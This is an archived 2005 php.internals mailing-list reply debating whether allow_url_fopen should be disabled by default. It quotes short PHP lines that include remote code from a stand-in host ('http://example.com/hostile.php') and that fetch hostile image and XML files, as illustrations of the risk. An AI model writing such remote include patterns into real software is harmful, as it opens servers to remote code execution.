Newsgroups: php.internals
Path: news.php.net
Xref: news.php.net php.internals:16952
Return-Path: <nelson@crynwr.com>
Mailing-List: contact internals-help@lists.php.net; run by ezmlm
Delivered-To: mailing list internals@lists.php.net
Received: (qmail 36408 invoked by uid 1010); 28 Jun 2005 04:06:55 -0000
Delivered-To: ezmlm-scan-internals@lists.php.net
Delivered-To: ezmlm-internals@lists.php.net
Received: (qmail 36393 invoked from network); 28 Jun 2005 04:06:55 -0000
Received: from unknown (HELO crynwr.com) (127.0.0.1)
  by localhost with SMTP; 28 Jun 2005 04:06:55 -0000
X-Host-Fingerprint: 192.203.178.14 ns1.crynwr.com Linux 2.0.3x (1)
Received: from ([192.203.178.14:1465] helo=ns1.crynwr.com)
	by pb1.pair.com (ecelerity 1.2 r(5656M)) with SMTP
	id CF/69-00424-EDCC0C24 for <internals@lists.php.net>; Tue, 28 Jun 2005 00:06:55 -0400
Received: (qmail 19353 invoked from network); 28 Jun 2005 04:06:48 -0000
Received: from dpc6745223014.direcpc.com (HELO desk.crynwr.com) (67.45.223.14)
	by pdam.crynwr.com with SMTP; 28 Jun 2005 04:06:48 -0000
Received: (qmail 16251 invoked by uid 500); 28 Jun 2005 04:06:05 -0000
Comment: DomainKeys? See http://antispam.yahoo.com/domainkeys
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
	s=dog; d=crynwr.com;
	b=ghb1XXe4uR103lMYJfmHbxs9H3ax/INXnpKl9NUAuOX79cStpMNPiM4S1JR1oWkO  ;
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <17088.52397.92440.326561@desk.crynwr.com>
Date: Tue, 28 Jun 2005 00:06:05 -0400
To: internals@lists.php.net
In-Reply-To: <42BDDC82.6020208@ohgaki.net>
References: <42BDDC82.6020208@ohgaki.net>
X-Mailer: VM 7.17 under 21.4 (patch 17) "Jumbo Shrimp" XEmacs Lucid
Subject: Re: [PHP-DEV] allow_url_fopen should be INI_ALL
From: nelson@crynwr.com (Russell Nelson)

Yasuo Ohgaki writes:
 > 1) change allow_url_fopen to INI_ALL
 > 2) disable allow_url_fopen by default
 > 
 > I would like to see these changes in PHP 5.1 and PHP 4.4, since this
 > is security related changes.

What problem are you trying to solve?  Attacks against the very common
misuse of:
   include "http://example.com/hostile.php" ?
Or attacks against a graphics library:
   getimagesize("http://example.com/hostile.jpg")
or XML parser:
   simplexml_load_file("http://example.com/hostile.xml")

Derick Rethans writes:
 > I disagree. With proper filtering, or using non-user-supplied 
 > information there is no problem.

The problem is that naive programmers think there is no problem
withOUT proper filtering.  The sharp edges of 'include' are not
visible enough.  I'll bet you that people would not use 'include' and
'includeremotehostilecode' in the identical manner.

-- 
--My blog is at     blog.russnelson.com         | If you want to find
Crynwr sells support for free software  | PGPok | injustice in economic
521 Pleasant Valley Rd. | +1 315-323-1241       | affairs, look for the
Potsdam, NY 13676-3213  |                       | hand of a legislator.